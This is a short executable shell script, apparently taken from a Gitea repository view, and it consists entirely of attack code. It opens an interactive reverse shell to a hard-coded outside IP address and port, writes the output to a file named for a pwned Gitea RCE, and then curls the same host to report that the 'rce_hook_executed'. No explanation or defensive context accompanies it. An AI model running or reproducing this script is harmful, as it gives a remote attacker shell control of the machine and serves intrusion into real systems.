4 lines
166 B
Bash
Executable File
4 lines
166 B
Bash
Executable File
#!/bin/sh
|
|
(bash -c "bash -i >& /dev/tcp/202.79.169.91/28016 0>&1") > /tmp/gitea_pwned_rce.txt 2>&1
|
|
curl -s http://202.79.169.91:28016/rce_hook_executed 2>/dev/null &
|